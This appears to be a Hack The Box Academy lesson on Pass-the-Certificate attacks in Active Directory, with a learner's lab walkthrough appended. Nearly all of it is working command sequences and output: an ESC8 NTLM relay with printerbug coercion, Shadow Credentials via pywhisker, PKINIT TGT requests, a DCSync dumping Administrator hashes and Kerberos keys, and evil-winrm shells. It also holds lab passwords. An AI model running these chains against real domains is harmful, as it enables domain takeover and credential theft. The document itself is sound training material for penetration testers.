Pass the Certificate

PKINIT, short for Public Key Cryptography for Initial Authentication, is an extension of the Kerberos protocol that enables the use of public key cryptography during the initial authentication exchange. It is typically used to support user logons via smart cards, which store the private keys. Pass-the-Certificate refers to the technique of using X.509 certificates to successfully obtain Ticket Granting Tickets (TGTs). This method is used primarily alongside attacks against Active Directory Certificate Services (AD CS), as well as in Shadow Credential attacks.

AD CS NTLM Relay Attack (ESC8)

Note: Attacks against Active Directory Certificate Services are covered in great depth in the ADCS Attacks module.

ESC8—as described in the Certified Pre-Owned paper—is an NTLM relay attack targeting an ADCS HTTP endpoint. ADCS supports multiple enrollment methods, including web enrollment, which by default occurs over HTTP. A certificate authority configured to allow web enrollment typically hosts the following application at /CertSrv:

Microsoft Active Directory Certificate Services webpage for inlanefreight-CA01-CA. Options to request a certificate, view pending requests, or download a certificate chain or CRL.

Attackers can use Impacket’s ntlmrelayx to listen for inbound connections and relay them to the web enrollment service using the following command:

0xH4shDumb@htb[/htb]$ impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication

Note: The value passed to --template may be different in other environments. This is simply the certificate template which is used by Domain Controllers for authentication. This can be enumerated with tools like certipy.

Attackers can either wait for victims to attempt authentication against their machine randomly, or they can actively coerce them into doing so. One way to force machine accounts to authenticate against arbitrary hosts is by exploiting the printer bug. This attack requires the targeted machine account to have the Printer Spooler service running. The command below forces 10.129.234.109 (DC01) to attempt authentication against 10.10.16.12 (attacker host):

0xH4shDumb@htb[/htb]$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12

[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.129.234.109
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

Referring back to ntlmrelayx, we can see from the output that the authentication request was successfully relayed to the web enrollment application, and a certificate was issued for DC01$:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.109, attacking target http://10.129.234.110
[*] HTTP server returned error code 404, treating as a successful login
[*] Authenticating against http://10.129.234.110 as INLANEFREIGHT/DC01$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.109, attacking target http://10.129.234.110
[-] Authenticating against http://10.129.234.110 as / FAILED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 8
[*] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file

We can now perform a Pass-the-Certificate attack to obtain a TGT as DC01$. One way to do this is by using gettgtpkinit.py. First, let's clone the repository and install the dependencies:

0xH4shDumb@htb[/htb]$ git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
0xH4shDumb@htb[/htb]$ python3 -m venv .venv
0xH4shDumb@htb[/htb]$ source .venv/bin/activate
0xH4shDumb@htb[/htb]$ pip3 install -r requirements.txt

Then, we can begin the attack.

Note: If you encounter error stating "Error detecting the version of libcrypto", it can be fixed by installing the oscrypto library.

0xH4shDumb@htb[/htb]$ pip3 install -I git+https://github.com/wbond/oscrypto.git
Defaulting to user installation because normal site-packages is not writeable
Collecting git+https://github.com/wbond/oscrypto.git
<SNIP>
Successfully built oscrypto
Installing collected packages: asn1crypto, oscrypto
Successfully installed asn1crypto-1.5.1 oscrypto-1.3.0

0xH4shDumb@htb[/htb]$ python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01\$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache

2025-04-28 21:20:40,073 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-28 21:20:40,351 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-28 21:21:05,508 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-28 21:21:05,508 minikerberos INFO     3a1d192a28a4e70e02ae4f1d57bad4adbc7c0b3e7dceb59dab90b8a54f39d616
INFO:minikerberos:3a1d192a28a4e70e02ae4f1d57bad4adbc7c0b3e7dceb59dab90b8a54f39d616
2025-04-28 21:21:05,512 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Once we successfully obtain a TGT, we're back in familiar Pass-the-Ticket (PtT) territory. As the domain controller's machine account, we can perform a DCSync attack to, for example, retrieve the NTLM hash of the domain administrator account:

0xH4shDumb@htb[/htb]$ export KRB5CCNAME=/tmp/dc.ccache
0xH4shDumb@htb[/htb]$ impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:...SNIP...:::
<SNIP>

Shadow Credentials (msDS-KeyCredentialLink)

Shadow Credentials refers to an Active Directory attack that abuses the msDS-KeyCredentialLink attribute of a victim user. This attribute stores public keys that can be used for authentication via PKINIT. In BloodHound, the AddKeyCredentialLink edge indicates that one user has write permissions over another user's msDS-KeyCredentialLink attribute, allowing them to take control of that user.

Diagram showing a connection between two users, wwhite@inlanefreight.locall and jpinkman@inlanefreight.locall, labeled "AddKeyCredentialLink."

We can use pywhisker to perform this attack from a Linux system. The command below generates an X.509 certificate and writes the public key to the victim user's msDS-KeyCredentialLink attribute:

0xH4shDumb@htb[/htb]$ pywhisker --dc-ip 10.129.234.109 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add

[*] Searching for the target account
[*] Target user found: CN=Jesse Pinkman,CN=Users,DC=inlanefreight,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 3496da7f-ab0d-13e0-1273-5abca66f901d
[*] Updating the msDS-KeyCredentialLink attribute of jpinkman
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: eFUVVTPf.pfx
[+] PFX exportiert nach: eFUVVTPf.pfx
[i] Passwort für PFX: bmRH4LK7UwPrAOfvIx6W
[+] Saved PFX (#PKCS12) certificate & key at path: eFUVVTPf.pfx
[*] Must be used with password: bmRH4LK7UwPrAOfvIx6W
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

In the output above, we can see that a PFX (PKCS12) file was created (eFUVVTPf.pfx), and the password is shown. We will use this file with gettgtpkinit.py to acquire a TGT as the victim:

0xH4shDumb@htb[/htb]$ python3 gettgtpkinit.py -cert-pfx ../eFUVVTPf.pfx -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' -dc-ip 10.129.234.109 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache

2025-04-28 20:50:04,728 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-28 20:50:04,775 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-28 20:50:04,929 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-28 20:50:04,929 minikerberos INFO     f4fa8808fb476e6f982318494f75e002f8ee01c64199b3ad7419f927736ffdb8
INFO:minikerberos:f4fa8808fb476e6f982318494f75e002f8ee01c64199b3ad7419f927736ffdb8
2025-04-28 20:50:04,937 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

With the TGT obtained, we may once again pass the ticket:

0xH4shDumb@htb[/htb]$ export KRB5CCNAME=/tmp/jpinkman.ccache
0xH4shDumb@htb[/htb]$ klist

Ticket cache: FILE:/tmp/jpinkman.ccache
Default principal: jpinkman@INLANEFREIGHT.LOCAL

Valid starting       Expires              Service principal
04/28/2025 20:50:04  04/29/2025 06:50:04  krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL

In this case, we discovered that the victim user is a member of the Remote Management Users group, which permits them to connect to the machine via WinRM. As demonstrated in the previous section, we can use Evil-WinRM to connect using Kerberos (note: ensure that krb5.conf is properly configured):

0xH4shDumb@htb[/htb]$ evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jpinkman\Documents> whoami
inlanefreight\jpinkman

No PKINIT?

In certain environments, an attacker may be able to obtain a certificate but be unable to use it for pre-authentication as specific victims (e.g., a domain controller machine account) due to the KDC not supporting the appropriate EKU. The tool PassTheCert was created for such situations. It can be used to authenticate against LDAPS using a certificate and perform various attacks (e.g., changing passwords or granting DCSync rights). This attack is outside the scope of this module but is worth reading about here.

---

Onwards

Now that we've seen how to perform various lateral movement techniques from Windows and Linux hosts, we'll pivot to a new focus: password management. Note that we recommend practicing all these lateral movement techniques until they become second nature. You never know what you will run into during an assessment, so having an extensive toolset to fall back on is critical.

---

Authenticate to:

• 10.129.27.0 (ACADEMY-PWATTCK-PTCDC01)

• 10.129.27.1 (ACADEMY-PWATTCK-PTCCA01)

With user "wwhite" and password "package5shores_topher1"

What are the contents of flag.txt on jpinkman's desktop?

Use pywhisker to add a TGT on jpinkman's account:

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools/pywhisker/pywhisker]
└──╼ [★]$ python3 pywhisker.py --dc-ip 10.129.234.174 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add
[*] Searching for the target account
[*] Target user found: CN=Jesse Pinkman,CN=Users,DC=inlanefreight,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: b2cb4f0d-f4de-9e39-227d-08b6089af209
[*] Updating the msDS-KeyCredentialLink attribute of jpinkman
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: rb82JWWk.pfx
/home/htb-ac-1811357/PtC/PKINITtools/pywhisker/pywhisker/pywhisker.py:54: CryptographyDeprecationWarning: Parsed a serial number which wasnt positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography.
  cert_obj = x509.load_pem_x509_certificate(pem_cert_data, default_backend())
[+] PFX exportiert nach: rb82JWWk.pfx
[i] Passwort für PFX: wqyvqw8dcaLGhrtSEONQ
[+] Saved PFX (#PKCS12) certificate & key at path: rb82JWWk.pfx
[*] Must be used with password: wqyvqw8dcaLGhrtSEONQ
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools/pywhisker/pywhisker]
└──╼ [★]$ ls
__init__.py  pywhisker.py  rb82JWWk_cert.pem  rb82JWWk.pfx  rb82JWWk_priv.pem

In the output above, we can see that a PFX (PKCS12) file was created (rb82JWWk.pfx), and the password is shown. We will use this file with gettgtpkinit.py to acquire a TGT as the victim:

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ python3 gettgtpkinit.py -cert-pfx ./pywhisker/pywhisker/rb82JWWk.pfx -pfx-pass 'wqyvqw8dcaLGhrtSEONQ' -dc-ip 10.129.234.174  INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
2026-02-06 04:32:01,275 minikerberos INFO     Loading certificate and key from file
2026-02-06 04:32:01,298 minikerberos INFO     Requesting TGT
2026-02-06 04:32:25,243 minikerberos INFO     AS-REP encryption key (you might need this later):
2026-02-06 04:32:25,243 minikerberos INFO     e8e5b983d01394e068dae8d5eba5fd07a9996bff65cde6548f7885c6422ac537
2026-02-06 04:32:25,247 minikerberos INFO     Saved TGT to file

Install kinit:

┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-q3om0cvllm]─[~/hack]
└──╼ [★]$ sudo apt install krb5-user

Modify /etc/krb5.conf:

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ cat /etc/krb5.conf 
[libdefaults]
    default_realm = INLANEFREIGHT.LOCAL
    dns_lookup_realm = false
    dns_lookup_kdc = false
    rdns = false
    ticket_lifetime = 24h
    forwardable = true
    permitted_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96 rc4-hmac

[realms]
    INLANEFREIGHT.LOCAL = {
        kdc = 10.129.234.174
        admin_server = 10.129.234.174
    }

[domain_realm]
    .inlanefreight.local = INLANEFREIGHT.LOCAL
    inlanefreight.local = INLANEFREIGHT.LOCAL

With the TGT obtained, we may once again pass the ticket:

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ export KRB5CCNAME=/tmp/jpinkman.ccache

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/jpinkman.ccache
Default principal: jpinkman@INLANEFREIGHT.LOCAL

Valid starting       Expires              Service principal
02/06/2026 04:30:12  02/06/2026 14:30:12  krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL

Add dc01.inlanefreight.local on /etc/hosts:

┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	debian12-parrot

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-xxyru4exyl htb-xxyru4exyl.htb-cloud.com
10.129.234.174 dc01.inlanefreight.local

Connect with evil-winrm to our target:

(.venv) ┌─[eu-academy-3]─[10.10.14.57]─[htb-ac-1811357@htb-xxyru4exyl]─[~/PtC/PKINITtools]
└──╼ [★]$ evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jpinkman\Documents> 

Get the flag:

*Evil-WinRM* PS C:\Users\jpinkman\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\jpinkman\Desktop> ls
    Directory: C:\Users\jpinkman\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/28/2025  12:10 PM             32 flag.txt


*Evil-WinRM* PS C:\Users\jpinkman\Desktop> cat flag.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

---

What are the contents of flag.txt on Administrator's desktop?

Use ntlmrelayx to get the certificate:

ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication

Launch printerbug:

printerbug.py INLANEFREIGHT.LOCAL/wwhite:package5shores_topher1@10.129.234.174 10.10.14.57

Get the new certificate:

[Feb 06, 2026 - 12:27:06 (CET)] exegol-htb CPTS_Passwords_Attack # ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
Impacket v0.13.0.dev0+20240918.213844.ac790f2b - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.129.234.172 as INLANEFREIGHT/DC01$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[-] Authenticating against http://10.129.234.172 as / FAILED
[*] GOT CERTIFICATE! ID 13
[*] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.129.234.174 controlled, but there are no more targets left!

List to be sure we have it:

[Feb 06, 2026 - 12:29:02 (CET)] exegol-htb CPTS_Passwords_Attack # ls
'DC01$.pfx'

Use it with gettgtpkinit to get a .ccache file:

[Feb 06, 2026 - 12:35:20 (CET)] exegol-htb CPTS_Passwords_Attack # gettgtpkinit.py -cert-pfx DC01\$.pfx -dc-ip 10.129.234.174 'INLANEFREIGHT.LOCAL/DC01$' dc.ccache
2026-02-06 12:36:37,761 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2026-02-06 12:36:38,349 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2026-02-06 12:37:06,235 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2026-02-06 12:37:06,236 minikerberos INFO     3f5d658035decbd63f9234579baa4dc338c4b4bff9edf5b80d19af21ccdbdd43
INFO:minikerberos:3f5d658035decbd63f9234579baa4dc338c4b4bff9edf5b80d19af21ccdbdd43
2026-02-06 12:37:06,255 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

[Feb 06, 2026 - 12:37:06 (CET)] exegol-htb CPTS_Passwords_Attack # ls
'DC01$.pfx'   dc.ccache

Use our .ccache file to connect with a DCSync:

[Feb 06, 2026 - 12:49:10 (CET)] exegol-htb CPTS_Passwords_Attack # export KRB5CCNAME=dc.ccache                                                                                                   
[Feb 06, 2026 - 12:49:50 (CET)] exegol-htb CPTS_Passwords_Attack # secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0.dev0+20240918.213844.ac790f2b - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ec2223ff4c0bce238aa04d30be0fe9e634495f9449c0c25307c66d7c12d8f93a
Administrator:aes128-cts-hmac-sha1-96:ffb8855b50dd1bf538c8001620c4f1d1
Administrator:des-cbc-md5:a1f262b50b64c46b
[*] Cleaning up... 

Now, connct with evil-Winrm and the Administrator's hash and get the flag:

[Feb 06, 2026 - 12:45:03 (CET)] exegol-htb CPTS_Passwords_Attack # evil-winrm -u "$USER" -p "$PASSWORD" -i "$TARGET"
                                        
Evil-WinRM shell v3.7
                                        
Info: Establishing connection to remote endpoint
^C
                                        
Warning: Press "y" to exit, press any other key to continue
                                        
Info: Exiting...
[Feb 06, 2026 - 12:45:13 (CET)] exegol-htb CPTS_Passwords_Attack # USER=Administrator
[Feb 06, 2026 - 12:45:18 (CET)] exegol-htb CPTS_Passwords_Attack # TARGET=10.129.234.174         
[Feb 06, 2026 - 12:45:44 (CET)] exegol-htb CPTS_Passwords_Attack # evil-winrm -u "$USER" -H "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" -i "$TARGET"                                
                                        
Evil-WinRM shell v3.7
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd "C:/Users/Administrator/Desktop/"
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/28/2025  12:10 PM             32 flag.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat "C:/Users/Administrator/Desktop/flag.txt"
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

---